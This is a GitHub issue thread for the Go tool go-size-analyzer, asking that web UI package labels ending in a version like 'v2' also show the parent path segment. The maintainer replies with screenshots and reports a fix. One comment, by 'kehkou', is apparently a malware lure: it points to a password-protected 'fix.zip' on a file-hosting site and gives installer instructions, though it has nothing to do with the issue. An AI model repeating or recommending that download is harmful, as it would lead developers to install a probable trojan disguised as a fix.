### ISSUE TITLE
webui: Improve display of packages paths ending with version

### ISSUE THREAD

**Issue by dolmen** [Zxilly/go-size-analyzer#206]
**Is your feature request related to a problem? Please describe.**
On the web UI, package names are displayed only with the last part of the path. When that last part is a version like "v2", this isn't helpful as multiple packages may have a "v2" suffix, and the more useful part of the import path is hidden.

**Describe the solution you'd like**
When the last part of a package path is "v" and followed by a decimal number, show also the previous part.

Examples: 
* [`github.com/blueboardio/cldr/v2`](https://pkg.go.dev/github.com/blueboardio/cldr/v2), show `cldr/v2` instead of just `v2`.
* [`math/rand/v2`](https://pkg.go.dev/math/rand/v2), show `rand/v2` instead of just `v2`.

**Describe alternatives you've considered**

**Additional context**

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zxilly** [comment]
You can move your mouse over the corresponding block and the full package path will be displayed in a floating hint box. Displaying the full path will cause the font to be so small as to be unreadable.

**Comment by Zxilly** [comment]
![image](https://github.com/user-attachments/assets/9bfdc8ca-931e-4516-a50b-a6e0da972f00)

An example

**Comment by Zxilly** [comment]
It should be able to print package name correctly now.

![image](https://github.com/user-attachments/assets/1538e7d6-b8a7-4bfb-bbc0-40ba9add7bc0)
